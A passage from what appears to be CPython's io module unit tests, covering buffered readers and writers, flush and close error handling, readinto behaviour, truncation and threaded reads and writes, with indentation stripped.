self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(os.fsencode(support.TESTFN)))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
